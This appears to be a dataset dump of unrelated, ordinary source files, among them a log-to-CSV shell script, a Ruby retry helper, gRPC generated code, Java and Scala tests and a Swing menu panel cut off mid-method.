text
stringlengths 1
1.05M
|
|---|
#!/bin/bash
#
# Extract nanopub-monitor test results from a log file and emit them as CSV
# (timestamp, plus the up-to-four result fields logged by ServerData).
#
# Usage:
#
# $ scripts/make-csv.sh path/to/nanopub-monitor.log > nanopub-monitor.csv
#
# "$1" is quoted so paths containing spaces work; grep reads the file
# directly instead of the original "cat $1 |" (which also hung on stdin
# when no argument was given).
grep " ch.tkuhn.nanopub.monitor.ServerData - Test result: " "$1" \
| sed -r 's/^\[INFO\] ([^ ]*) .* Test result: ([^ ]*) ([^ ]*) ([^ ]*)( ([^ ]*))?$/\1,\2,\3,\4,\6/'
|
# frozen_string_literal: true
module GithubAuthentication
  # Mixin providing retry-with-backoff around a block.
  module Retriable
    # Runs the block, retrying when one of +exceptions+ is raised (all
    # StandardErrors when none are given). The block receives the current
    # attempt number (1-based) and the exception from the previous attempt
    # (nil on the first call). Re-raises once max_attempts is exhausted.
    def with_retries(*exceptions, max_attempts: 4, sleep_between_attempts: 0.1, exponential_backoff: true)
      previous_failure = nil
      attempt = 1
      loop do
        begin
          return yield(attempt, previous_failure)
        rescue *exceptions => error
          raise unless attempt < max_attempts

          sleep_after_attempt(
            attempt: attempt,
            base_sleep_time: sleep_between_attempts,
            exponential_backoff: exponential_backoff
          )
          previous_failure = error
          attempt += 1
        end
      end
    end

    private

    # Sleeps between attempts; a non-positive base sleep time disables sleeping.
    def sleep_after_attempt(attempt:, base_sleep_time:, exponential_backoff:)
      return unless base_sleep_time > 0

      duration =
        if exponential_backoff
          calculate_exponential_backoff(attempt: attempt, base_sleep_time: base_sleep_time)
        else
          base_sleep_time
        end
      Kernel.sleep(duration)
    end

    # The sleep window doubles with every attempt; the actual duration is drawn
    # uniformly from the window for more optimal request distribution.
    def calculate_exponential_backoff(attempt:, base_sleep_time:)
      minimum = Float(base_sleep_time)
      maximum = minimum * (2 << (attempt - 2))
      Kernel.rand(minimum..maximum)
    end
  end
end
|
class ResponseBuilder {
    /** Response payload assembled via the fluent setters below. */
    private $response = [
        'code' => 200,
        'status' => 'success',
        'data' => null,
        'url' => null
    ];

    /** Stores one response field and returns $this so calls can be chained. */
    private function set($key, $value) {
        $this->response[$key] = $value;
        return $this;
    }

    /** Sets the response code (default 200). */
    public function code($code) {
        return $this->set('code', $code);
    }

    /** Sets the response status string (default 'success'). */
    public function status($status) {
        return $this->set('status', $status);
    }

    /** Sets the response payload. */
    public function data($data) {
        return $this->set('data', $data);
    }

    /** Sets the target URL used by redirect(). */
    public function url($url) {
        return $this->set('url', $url);
    }

    /** Sends a Location header for the stored URL and stops the request. */
    public function redirect() {
        header("Location: " . $this->response['url']);
        exit;
    }

    /**
     * Turns an exception into an error response (code 400) and redirects back
     * to the repository's blog page. Never returns: redirect() exits.
     */
    public function handleException($e, $repository) {
        $this->response['message'] = $e->getMessage();
        $this->response['code'] = 400;
        $this->response['status'] = 'error';
        $this->response['url'] = guard_url('blog/blog/' . $repository->getRouteKey());
        $this->redirect();
    }
}
|
package itunes
// URLTrack is a Track whose audio is served from a network stream
// identified by Address (rather than a local file).
type URLTrack struct {
	Track          // embedded base track (defined elsewhere in this package)
	Address string // the URL for this track
}
|
<gh_stars>1-10
package org.galaxyproject.dockstore_galaxy_interface.language;
import com.google.common.io.Resources;
import com.google.gson.Gson;
import com.google.gson.GsonBuilder;
import com.google.gson.reflect.TypeToken;
import io.dockstore.common.VersionTypeValidation;
import io.dockstore.language.CompleteLanguageInterface;
import io.dockstore.language.MinimalLanguageInterface;
import io.dockstore.language.RecommendedLanguageInterface;
import java.io.File;
import java.io.IOException;
import java.net.URL;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Optional;
import java.util.regex.Matcher;
import org.apache.commons.io.FileUtils;
import org.apache.commons.lang3.tuple.Pair;
import org.junit.Assert;
import org.junit.Test;
public class GalaxyWorkflowLanguagePluginTest {
public static final String REPO_ID_1 = "jmchilton/galaxy-workflow-dockstore-example-1";
public static final String REPO_FORMAT_2 = "https://raw.githubusercontent.com/" + REPO_ID_1;
public static final String REPO_ID_2 = "mvdbeek/galaxy-workflow-dockstore-example-2";
public static final String REPO_NATIVE = "https://raw.githubusercontent.com/" + REPO_ID_2;
public static final String EXAMPLE_FILENAME_1 = "Dockstore.gxwf.yml";
public static final String EXAMPLE_FILENAME_1_PATH = "/" + EXAMPLE_FILENAME_1;
public static final String EXAMPLE_FILENAME_2 = "Dockstore.gxwf.yaml";
public static final String EXAMPLE_FILENAME_2_PATH = "/" + EXAMPLE_FILENAME_2;
public static final String EXAMPLE_FILENAME_NATIVE = "Dockstore.ga";
public static final String EXAMPLE_FILENAME_NATIVE_PATH = "/" + EXAMPLE_FILENAME_NATIVE;
public static final String CURRENT_BRANCH = "master";
@Test
public void testFormat2WorkflowParsing() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final HttpFileReader reader = new HttpFileReader(REPO_FORMAT_2);
final String initialPath = EXAMPLE_FILENAME_1_PATH;
final String contents = reader.readFile(EXAMPLE_FILENAME_1);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(1, fileMap.size());
final Pair<String, MinimalLanguageInterface.GenericFileType> discoveredFile =
fileMap.get("/Dockstore.gxwf-test.yml");
Assert.assertEquals(
discoveredFile.getRight(), MinimalLanguageInterface.GenericFileType.TEST_PARAMETER_FILE);
final RecommendedLanguageInterface.WorkflowMetadata metadata =
plugin.parseWorkflowForMetadata(initialPath, contents, fileMap);
// We don't track these currently, but we could pull out the CWL parsing and mimic that.
Assert.assertNull(metadata.getAuthor());
Assert.assertNull(metadata.getEmail());
// We have name and annotation - not sure if this should just be "<name>"", or "<name>.
// <annotation>", or
// "<name>/n<annotation>".
// There is a doc for this workflow, use that for the description
Assert.assertEquals("This is the documentation for the workflow.", metadata.getDescription());
// Test validation stubs...
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertTrue(wfValidation.isValid());
final VersionTypeValidation testValidation = plugin.validateTestParameterSet(fileMap);
Assert.assertTrue(testValidation.isValid());
// No validation messages because everything is fine...
Assert.assertTrue(wfValidation.getMessage().isEmpty());
final Map<String, Object> cytoscapeElements =
plugin.loadCytoscapeElements(initialPath, contents, fileMap);
// do a sanity check for a valid cytoscape JSON
// http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json
Assert.assertTrue(
cytoscapeElements.containsKey("nodes") && cytoscapeElements.containsKey("edges"));
final List<CompleteLanguageInterface.RowData> rowData =
plugin.generateToolsTable(initialPath, contents, fileMap);
Assert.assertFalse(rowData.isEmpty());
}
@Test
public void testNativeWorkflowParsing() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final HttpFileReader reader = new HttpFileReader(REPO_NATIVE);
final String initialPath = EXAMPLE_FILENAME_NATIVE_PATH;
final String contents = reader.readFile(EXAMPLE_FILENAME_NATIVE);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(1, fileMap.size());
final Pair<String, MinimalLanguageInterface.GenericFileType> discoveredFile =
fileMap.get("/Dockstore-test.yml");
Assert.assertEquals(
discoveredFile.getRight(), MinimalLanguageInterface.GenericFileType.TEST_PARAMETER_FILE);
final RecommendedLanguageInterface.WorkflowMetadata metadata =
plugin.parseWorkflowForMetadata(initialPath, contents, fileMap);
// We don't track these currently - especially with native format.
Assert.assertNull(metadata.getAuthor());
Assert.assertNull(metadata.getEmail());
Assert.assertEquals("This is the documentation for the workflow.", metadata.getDescription());
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertTrue(wfValidation.isValid());
// No validation messages because everything is fine...
Assert.assertTrue(wfValidation.getMessage().isEmpty());
final Map<String, Object> cytoscapeElements =
plugin.loadCytoscapeElements(initialPath, contents, fileMap);
// do a sanity check for a valid cytoscape JSON
// http://manual.cytoscape.org/en/stable/Supported_Network_File_Formats.html#cytoscape-js-json
Assert.assertTrue(
cytoscapeElements.containsKey("nodes") && cytoscapeElements.containsKey("edges"));
final List<CompleteLanguageInterface.RowData> rowData =
plugin.generateToolsTable(initialPath, contents, fileMap);
Assert.assertFalse(rowData.isEmpty());
}
@Test
public void testValidationIssues() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final ResourceFileReader reader = new ResourceFileReader("invalid_report_ga");
final String initialPath = "missing_markdown.ga";
final String contents = reader.readFile(initialPath);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(0, fileMap.size());
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertFalse(wfValidation.isValid());
final Map<String, String> messages = wfValidation.getMessage();
Assert.assertTrue(messages.containsKey(initialPath));
final String validationProblem = messages.get(initialPath);
Assert.assertTrue(validationProblem.indexOf("markdown") > 0);
}
@Test
public void testTwoValidationIssues() {
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
final ResourceFileReader reader = new ResourceFileReader("invalid_report_ga");
final String initialPath = "two_validation_errors.ga";
final String contents = reader.readFile(initialPath);
final Map<String, Pair<String, MinimalLanguageInterface.GenericFileType>> fileMap =
plugin.indexWorkflowFiles(initialPath, contents, reader);
Assert.assertEquals(0, fileMap.size());
final VersionTypeValidation wfValidation =
plugin.validateWorkflowSet(initialPath, contents, fileMap);
Assert.assertFalse(wfValidation.isValid());
final Map<String, String> messages = wfValidation.getMessage();
final String validationProblem = messages.get(initialPath);
Assert.assertTrue(validationProblem.contains("- .. ERROR"));
Assert.assertTrue(validationProblem.contains("- .. WARNING"));
}
@Test
public void testInitialPathPattern() {
// TODO: This doesn't seem to be called by Dockstore anywhere - is that right?
final GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl plugin =
new GalaxyWorkflowPlugin.GalaxyWorkflowPluginImpl();
Matcher m = plugin.initialPathPattern().matcher(EXAMPLE_FILENAME_1_PATH);
Assert.assertTrue("File name matches for initial path pattern", m.matches());
m = plugin.initialPathPattern().matcher(EXAMPLE_FILENAME_2_PATH);
Assert.assertTrue("File name matches for initial path pattern", m.matches());
m = plugin.initialPathPattern().matcher(EXAMPLE_FILENAME_NATIVE_PATH);
Assert.assertTrue("File name matches for initial path pattern (native workflows)", m.matches());
m = plugin.initialPathPattern().matcher("/Dockerstore.cwl");
Assert.assertFalse(m.matches());
m = plugin.initialPathPattern().matcher("/Dockerstore.nf");
Assert.assertFalse(m.matches());
}
abstract static class URLFileReader implements MinimalLanguageInterface.FileReader {
// URL to repo
protected final String repo;
// extracted ID
protected final Optional<String> id;
URLFileReader(final String repo) {
this.repo = repo;
final String[] split = repo.split("/");
if (split.length >= 2) {
id = Optional.of(split[split.length - 2] + "/" + split[split.length - 1]);
} else {
id = Optional.empty();
}
}
protected abstract URL getUrl(final String path) throws IOException;
@Override
public String readFile(String path) {
try {
if (path.startsWith("/")) {
path = path.substring(1);
}
URL url = this.getUrl(path);
return Resources.toString(url, StandardCharsets.UTF_8);
} catch (IOException e) {
throw new RuntimeException(e);
}
}
@Override
public List<String> listFiles(String pathToDirectory) {
if (id.isEmpty()) {
return new ArrayList<>();
}
Gson gson = new GsonBuilder().create();
try {
final String fileContent =
FileUtils.readFileToString(
new File("src/test/resources/" + this.id.get() + "/listing.json"));
return gson.fromJson(
fileContent, TypeToken.getParameterized(List.class, String.class).getType());
} catch (IOException e) {
throw new RuntimeException("test failed to read directory listing");
}
}
}
static class ResourceFileReader extends URLFileReader {
ResourceFileReader(final String repo) {
super(repo);
}
@Override
protected URL getUrl(String path) throws IOException {
final String classPath = "repos/" + this.repo + "/" + path;
final URL url = GalaxyWorkflowLanguagePluginTest.class.getResource(classPath);
if (url == null) {
throw new IOException("No such file " + classPath);
}
return url;
}
}
static class HttpFileReader extends URLFileReader {
HttpFileReader(final String repo) {
super(repo);
}
@Override
protected URL getUrl(final String path) throws IOException {
return new URL(this.repo + "/" + CURRENT_BRANCH + "/" + path);
}
}
}
|
package ai.lum.odinson.state
import ai.lum.odinson.utils.TestUtils.OdinsonTest
// Compares extraction with the "mock" state against the "memory" state on the
// same document: rules whose arguments reference mentions produced by an
// earlier priority only fire when the state retains those mentions.
class TestMockState extends OdinsonTest {
  val docGummy = getDocument("becky-gummy-bears-v2")
  // Engine backed by the mock state — TODO confirm: the assertions below
  // imply it does not make earlier-priority mentions available later.
  val eeGummy = extractorEngineWithSpecificState(docGummy, "mock")
  // Engine backed by an in-memory state that retains mentions across priorities.
  val eeGummyMemory = extractorEngineWithSpecificState(docGummy, "memory")
  "MockState" should "return mentions" in {
    val rules = """
|rules:
| - name: gummy-rule
| label: Gummy
| type: basic
| priority: 1
| pattern: |
| gummy
|
| - name: eating-rule
| label: Consumption
| type: event
| priority: 2
| pattern: |
| trigger = [lemma=eat]
| subject: ^NP = >nsubj []
| object: ^NP = >dobj []
|
| - name: nomatch-rule
| label: GummyBear
| type: event
| priority: 2
| pattern: |
| trigger = bears
| arg: Gummy = >amod
""".stripMargin
    val extractors = eeGummy.compileRuleString(rules)
    val mentions = eeGummy.extractMentions(extractors).toArray
    // "gummy" from first rule and the main event with both args in second
    mentions should have size (4)
    // nomatch-rule needs the priority-1 Gummy mention; the mock state does not
    // supply it, so no GummyBear mentions are produced.
    getMentionsWithLabel(mentions, "GummyBear") should have size (0)
  }
  "MemoryState" should "return mentions" in {
    val rules = """
|rules:
| - name: gummy-rule
| label: Bear
| type: basic
| priority: 1
| pattern: |
| gummy
|
| - name: eating-rule
| label: Consumption
| type: event
| priority: 2
| pattern: |
| trigger = [lemma=eat]
| subject: ^NP = >nsubj []
| object: ^NP = >dobj []
|
| - name: nomatch-rule
| label: Gummy
| type: event
| priority: 2
| pattern: |
| trigger = bears
| arg: Bear = >amod
""".stripMargin
    val extractors = eeGummyMemory.ruleReader.compileRuleString(rules)
    val mentions = eeGummyMemory.extractMentions(extractors).toArray
    // the 3 main extractions + 2 promoted args
    mentions should have size (5)
    // With the memory state the priority-1 Bear mention IS available, so the
    // dependent rule fires once.
    getMentionsWithLabel(mentions, "Gummy") should have size (1)
  }
}
|
/**
 * Returns the larger of the two values; when they are equal, that shared
 * value is returned.
 *
 * @param num1 first candidate
 * @param num2 second candidate
 * @return the maximum of num1 and num2
 */
public static int findMax(int num1, int num2) {
    return num1 > num2 ? num1 : num2;
}
|
<filename>tutos/src/tools/schemas/careers.js
import { schema } from 'normalizr'
// Normalizr entity schema for a single career record; normalized results are
// stored under the 'careers' key (default idAttribute 'id').
export const career = new schema.Entity(
  'careers',
)
// Schema for a homogeneous array of career entities.
export const careers = new schema.Array(career)
|
// Code generated by protoc-gen-go-grpc. DO NOT EDIT.
package testdata
import (
context "context"
grpc "google.golang.org/grpc"
codes "google.golang.org/grpc/codes"
status "google.golang.org/grpc/status"
)
// This is a compile-time assertion to ensure that this generated file
// is compatible with the grpc package it is being compiled against.
// Requires gRPC-Go v1.32.0 or later.
const _ = grpc.SupportPackageIsVersion7

// TestClient is the client API for Test service.
//
// For semantics around ctx use and closing/ending streaming RPCs, please refer to https://pkg.go.dev/google.golang.org/grpc/?tab=doc#ClientConn.NewStream.
type TestClient interface {
	// StreamOutput starts the server-streaming StreamOutput RPC; responses
	// are read from the returned stream via Recv.
	StreamOutput(ctx context.Context, in *StreamOutputRequest, opts ...grpc.CallOption) (Test_StreamOutputClient, error)
}

// testClient is the generated TestClient implementation; all RPCs go through cc.
type testClient struct {
	cc grpc.ClientConnInterface
}

// NewTestClient returns a TestClient that issues RPCs over the given connection.
func NewTestClient(cc grpc.ClientConnInterface) TestClient {
	return &testClient{cc}
}

// StreamOutput opens the stream, sends the single request message, closes the
// send direction, and returns the receive-only stream wrapper.
func (c *testClient) StreamOutput(ctx context.Context, in *StreamOutputRequest, opts ...grpc.CallOption) (Test_StreamOutputClient, error) {
	stream, err := c.cc.NewStream(ctx, &Test_ServiceDesc.Streams[0], "/test.chunk.Test/StreamOutput", opts...)
	if err != nil {
		return nil, err
	}
	x := &testStreamOutputClient{stream}
	if err := x.ClientStream.SendMsg(in); err != nil {
		return nil, err
	}
	if err := x.ClientStream.CloseSend(); err != nil {
		return nil, err
	}
	return x, nil
}

// Test_StreamOutputClient is the client-side view of the StreamOutput stream.
type Test_StreamOutputClient interface {
	Recv() (*StreamOutputResponse, error)
	grpc.ClientStream
}

type testStreamOutputClient struct {
	grpc.ClientStream
}

// Recv blocks for the next StreamOutputResponse, propagating any RecvMsg error.
func (x *testStreamOutputClient) Recv() (*StreamOutputResponse, error) {
	m := new(StreamOutputResponse)
	if err := x.ClientStream.RecvMsg(m); err != nil {
		return nil, err
	}
	return m, nil
}
// TestServer is the server API for Test service.
// All implementations must embed UnimplementedTestServer
// for forward compatibility
type TestServer interface {
	StreamOutput(*StreamOutputRequest, Test_StreamOutputServer) error
	mustEmbedUnimplementedTestServer()
}

// UnimplementedTestServer must be embedded to have forward compatible implementations.
type UnimplementedTestServer struct {
}

// StreamOutput fails with codes.Unimplemented unless overridden by the embedder.
func (UnimplementedTestServer) StreamOutput(*StreamOutputRequest, Test_StreamOutputServer) error {
	return status.Errorf(codes.Unimplemented, "method StreamOutput not implemented")
}
func (UnimplementedTestServer) mustEmbedUnimplementedTestServer() {}

// UnsafeTestServer may be embedded to opt out of forward compatibility for this service.
// Use of this interface is not recommended, as added methods to TestServer will
// result in compilation errors.
type UnsafeTestServer interface {
	mustEmbedUnimplementedTestServer()
}

// RegisterTestServer attaches the Test service implementation to the registrar.
func RegisterTestServer(s grpc.ServiceRegistrar, srv TestServer) {
	s.RegisterService(&Test_ServiceDesc, srv)
}

// _Test_StreamOutput_Handler decodes the single request message and dispatches
// to the registered TestServer with a send-only stream wrapper.
func _Test_StreamOutput_Handler(srv interface{}, stream grpc.ServerStream) error {
	m := new(StreamOutputRequest)
	if err := stream.RecvMsg(m); err != nil {
		return err
	}
	return srv.(TestServer).StreamOutput(m, &testStreamOutputServer{stream})
}

// Test_StreamOutputServer is the server-side view of the StreamOutput stream.
type Test_StreamOutputServer interface {
	Send(*StreamOutputResponse) error
	grpc.ServerStream
}

type testStreamOutputServer struct {
	grpc.ServerStream
}

// Send writes one response message onto the stream.
func (x *testStreamOutputServer) Send(m *StreamOutputResponse) error {
	return x.ServerStream.SendMsg(m)
}
// Test_ServiceDesc is the grpc.ServiceDesc for Test service.
// It's only intended for direct use with grpc.RegisterService,
// and not to be introspected or modified (even as a copy)
var Test_ServiceDesc = grpc.ServiceDesc{
	ServiceName: "test.chunk.Test",
	HandlerType: (*TestServer)(nil),
	// No unary methods: StreamOutput is the service's only (server-streaming) RPC.
	Methods: []grpc.MethodDesc{},
	Streams: []grpc.StreamDesc{
		{
			StreamName:    "StreamOutput",
			Handler:       _Test_StreamOutput_Handler,
			ServerStreams: true,
		},
	},
	Metadata: "helper/chunk/testdata/test.proto",
}
|
<reponame>stephenjelfs/react-dnd-tutorial-typescript-mobx
// Minimal ambient typing for the react-dnd HTML5 backend package: its default
// export is declared to implement the __ReactDnd.Backend interface.
declare module "react-dnd-html5-backend" {
    export default class HTML5Backend implements __ReactDnd.Backend {}
}
|
package com.ctrip.persistence.service;
import com.ctrip.persistence.entity.*;
import com.ctrip.persistence.enums.MLFlowStatus;
import com.ctrip.persistence.pojo.DataResult;
import com.ctrip.persistence.pojo.Result;
import java.util.List;
import java.util.Map;
/**
 * Created by juntao on 2/14/16.
 * Machine-learning flow (algorithm development) service: CRUD and lifecycle
 * operations for MLFlow jobs, their elements, and linked Zeppelin paragraphs.
 *
 * @author 张峻滔
 */
public interface MLFlowService {
    /** Global configuration as key/value pairs. */
    Map<String, Object> getConf();
    void saveOrUpdateJobFlow(MLFlow flow);
    void saveFlow(MLFlow flow);
    /** Configuration for a single flow. */
    Map<String, Object> getConf(Long flowId);
    /** Configuration scoped to one owner. */
    Map<String, Object> getUserConf(Long ownerId);
    List<MLFlow> getAllFlow();
    List<MLFlowHistory> getFlowHistory(Long id);
    Result deleteMLJob(Long id);
    MLFlow getById(Long id);
    MLFlow getByName(String name);
    Result stopMLJob(Long id);
    /* Mark a running job as finished normally. */
    Result finishRunningMLJob(Long id);
    Result getElement(Long id);
    /* Save a user-defined (custom) element template. */
    void saveCusElementTpl(ElementTpl tpl);
    Result updateElementStatus(Long id, MLFlowStatus status);
    /* Fetch the notebook paragraph from Zeppelin and persist it. */
    DataResult<ZeppelinParagraph> saveReadyZeppelinNote(ZeppelinParagraph paragraph);
    Result updateZeppelinParagraph(Long elementId, ZeppelinParagraph paragraph);
    Result getZeppelinParagraph(Long elementId);
    List<ElementHistory> findByMlFlowId(Long id);
    String getNameById(Long id);
    Long getOwnerIdByMlFlowId(Long id);
}
|
package com.packtpub.designpatterns.structural;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.util.UUID;
import com.packtpub.designpatterns.creational.ConnectionManager;
public class CabBooking {

    /** Shared connection manager (singleton) used for every booking. */
    ConnectionManager instance = null;

    public CabBooking() {
        instance = ConnectionManager.getInstance();
    }

    /**
     * Inserts a new CabBooking row (random UUID booking id) and prints a
     * confirmation with the booking details.
     *
     * @param guestName    name of the guest booking the cab
     * @param fromLocation pickup location
     * @param toLocation   destination
     * @param bookingDate  date of the booking
     * @param cabNo        identifier of the assigned cab
     * @return number of rows inserted (1 on success, 0 on failure)
     */
    public int BookCab(String guestName, String fromLocation,
            String toLocation, Date bookingDate, String cabNo) {
        int count = 0;
        String bookingId = UUID.randomUUID().toString();
        String sql = "insert into CabBooking values(?,?,?,?,?,?)";
        // try-with-resources closes the statement and connection even when
        // executeUpdate throws; the original leaked both on any exception.
        try (Connection conn = instance.getConnection();
                PreparedStatement pstmt = conn.prepareStatement(sql)) {
            pstmt.setString(1, bookingId);
            pstmt.setString(2, guestName);
            pstmt.setString(3, fromLocation);
            pstmt.setString(4, toLocation);
            pstmt.setDate(5, bookingDate);
            pstmt.setString(6, cabNo);
            count = pstmt.executeUpdate();
            System.out.println("Cab Booking for " + guestName
                    + " done.\n");
            System.out.println("Booking Details :\nFrom : "
                    + fromLocation + ",Destination: " + toLocation
                    + "Booking Date : " + bookingDate + "Cab No : " + cabNo + "\n");
        } catch (Exception e) {
            // Best-effort logging preserved from the original; callers detect
            // failure via the returned count of 0.
            e.printStackTrace();
        }
        return count;
    }
}
|
from django import forms
from .models import PBSMMEpisode
class PBSMMEpisodeCreateForm(forms.ModelForm):
    """
    This overrides the Admin form when creating an Episode (by hand).
    Usually Episodes are "created" when ingesting a parental Season
    (or a grand-parental Show).
    """
    class Meta:
        model = PBSMMEpisode
        # Only these two fields are entered manually; presumably the rest are
        # populated during ingest — TODO confirm against the ingest pipeline.
        fields = ('slug', 'season')
class PBSMMEpisodeEditForm(forms.ModelForm):
    """Admin form for editing an existing Episode; exposes all model fields."""
    class Meta:
        model = PBSMMEpisode
        exclude = []  # empty exclude list == include every field on the form
|
<filename>src/app/app.routing.ts
import { ModuleWithProviders } from '@angular/core';
import { Routes, RouterModule } from '@angular/router';
import { WelcomeComponent } from './welcome/welcome.component';
import { GameOverComponent } from './game-over/game-over.component';
import { SuccessComponent } from './success/success.component';
// Route table: welcome screen at the root plus the two terminal screens.
const appRoutes: Routes = [
  {
    path: '',
    component: WelcomeComponent
  },
  {
    path: 'game-over',
    component: GameOverComponent
  },
  {
    path: 'success',
    component: SuccessComponent
  }
];
// Root router configuration, exported for the AppModule's imports array.
export const routing: ModuleWithProviders = RouterModule.forRoot(appRoutes);
|
package org.nem.core.model.ncc;
import org.nem.core.model.namespace.*;
import org.nem.core.model.primitive.BlockHeight;
/**
 * Meta-data pair test specialization pairing a Namespace entity with a
 * DefaultMetaData id; all assertions live in the generic base class.
 */
public class NamespaceMetaDataPairTest extends AbstractMetaDataPairTest<Namespace, DefaultMetaData> {
    public NamespaceMetaDataPairTest() {
        // Supplies: entity factory, meta-data factory, the two pair
        // constructors, and the accessors the base class uses to compare
        // entity address and meta-data id.
        super(account -> new Namespace(new NamespaceId("foo"), account, new BlockHeight(17)), id -> new DefaultMetaData((long) id),
        NamespaceMetaDataPair::new, NamespaceMetaDataPair::new, namespace -> namespace.getOwner().getAddress(),
        metaData -> metaData.getId().intValue());
    }
}
|
<html>
<head>
<title>Calculator</title>
<script>
// Reads both operands, adds them, and shows the result in #output.
// Non-numeric input (Number(...) -> NaN) now yields a readable message
// instead of literal "NaN"; textContent is used rather than innerHTML so
// the output is never interpreted as markup.
function calculate() {
  const a = Number(document.getElementById('a').value);
  const b = Number(document.getElementById('b').value);
  const sum = a + b;
  document.getElementById('output').textContent =
    Number.isNaN(sum) ? 'Invalid input' : String(sum);
}
</script>
</head>
<body>
<input type="text" id="a"/>
<input type="text" id="b"/>
<button onclick="calculate()">Calculate</button>
<div id="output"></div>
</body>
</html>
|
package com.github.jinahya.datagokr.api.b090041_.lunphinfoservice.client.message.adapter;
import java.time.Month;
import java.time.format.DateTimeFormatter;
/**
 * XML adapter mapping {@link Month} values to/from a zero-padded two-digit
 * "MM" string (e.g. {@code "07"} for July).
 */
public class MmMonthAdapter extends FormattedTemporalAdapter<Month> {
    /** Formatter for the two-digit month-of-year pattern. */
    public static final DateTimeFormatter MONTH_MM_FORMATTER = DateTimeFormatter.ofPattern("MM");
    /** Wires the MM formatter and {@link Month#from} query into the base adapter. */
    public MmMonthAdapter() {
        super(Month.class, MONTH_MM_FORMATTER, Month::from);
    }
}
|
package io.quarkuscoffeeshop.counter.domain;
/** Status of a single order line item; apparent lifecycle order by name: placed -> in progress -> fulfilled. */
public enum LineItemStatus {
    PLACED, IN_PROGRESS, FULFILLED
}
|
package de.hswhameln.typetogether.client.gui;
import java.awt.BorderLayout;
import java.awt.Color;
import java.awt.Dimension;
import java.awt.FlowLayout;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.beans.PropertyChangeEvent;
import java.util.logging.Level;
import java.util.logging.Logger;
import java.util.stream.Collectors;
import javax.swing.BorderFactory;
import javax.swing.Box;
import javax.swing.BoxLayout;
import javax.swing.JButton;
import javax.swing.JLabel;
import javax.swing.JList;
import javax.swing.JOptionPane;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTextField;
import javax.swing.SwingConstants;
import de.hswhameln.typetogether.client.businesslogic.ClientUser;
import de.hswhameln.typetogether.client.runtime.PropertyChangeManager;
import de.hswhameln.typetogether.client.runtime.SessionStorage;
import de.hswhameln.typetogether.networking.LocalDocument;
import de.hswhameln.typetogether.networking.api.Document;
import de.hswhameln.typetogether.networking.api.Lobby;
import de.hswhameln.typetogether.networking.api.exceptions.InvalidDocumentIdException;
import de.hswhameln.typetogether.networking.util.ExceptionHandler;
import de.hswhameln.typetogether.networking.util.LoggerFactory;
public class MenuPanel extends AbstractPanel {
private final Logger logger = LoggerFactory.getLogger(this);
private JPanel leftSide;
private JPanel rightSide;
private JTextField documentNameField;
private JScrollPane tablePane;
private JList<String> documentTable;
private String[] tableData;
private ClientUser user;
private final Lobby lobby;
private final PropertyChangeManager propertyChangeManager;
private JLabel username;
/**
 * Builds the menu panel: binds the lobby and current user from the session
 * storage, subscribes to CURRENT_USER changes, and lays out both halves.
 *
 * NOTE(review): setUser(...) runs before propertyChangeManager and the
 * username label are initialized; if getCurrentUser() ever returns non-null
 * here, setUser would register a null listener and hit a null username
 * label — confirm the current user is always null at construction time.
 */
public MenuPanel(MainWindow window, SessionStorage sessionStorage) {
    super(window, sessionStorage);
    this.lobby = sessionStorage.getLobby();
    this.setUser(sessionStorage.getCurrentUser());
    this.propertyChangeManager = new PropertyChangeManager();
    sessionStorage.addPropertyChangeListener(this.propertyChangeManager);
    this.propertyChangeManager.onPropertyChange(SessionStorage.CURRENT_USER, this::currentUserChanged);
    this.setLayout(new BoxLayout(this, BoxLayout.PAGE_AXIS));
    this.setSize(ViewProperties.DEFAULT_WIDTH, ViewProperties.DEFAULT_HEIGHT);
    this.createGrid();
    this.createLeftSide();
    this.createRightSide();
}
/**
 * Reloads the sorted list of document ids from the lobby and refreshes the
 * document table.
 */
@Override
public void initialize() {
    this.tableData = this.sessionStorage
    .getLobby()
    .getDocumentIds()
    .stream()
    .sorted()
    .toArray(String[]::new);
    this.documentTable.setListData(this.tableData);
}
/**
 * Builds the right half of the menu: a headline row with a refresh button
 * and a scrollable list of the lobby's document ids. Double-clicking a list
 * entry copies its name into the document-name field and joins it.
 */
private void createRightSide() {
    BoxLayout layout = new BoxLayout(this.rightSide, BoxLayout.Y_AXIS);
    this.rightSide.setLayout(layout);
    JPanel gridPanel = new JPanel(new FlowLayout());
    gridPanel.setBackground(ViewProperties.BACKGROUND_COLOR);
    JButton refresh = new JButton("Aktualisieren");
    refresh.setBackground(ViewProperties.CONTRAST_COLOR);
    refresh.setForeground(ViewProperties.BACKGROUND_COLOR);
    refresh.setFont(ViewProperties.SUBHEADLINE_FONT);
    refresh.setBorder(BorderFactory.createEmptyBorder());
    refresh.addActionListener(e -> this.onRefresh());
    // NOTE(review): the button is added to rightSide here and to gridPanel
    // below; Swing reparents on the second add, so only the gridPanel
    // placement survives — confirm this first add is intentional.
    this.rightSide.add(refresh);
    JLabel headlineLabel = new JLabel("Verfügbare Dokumente");
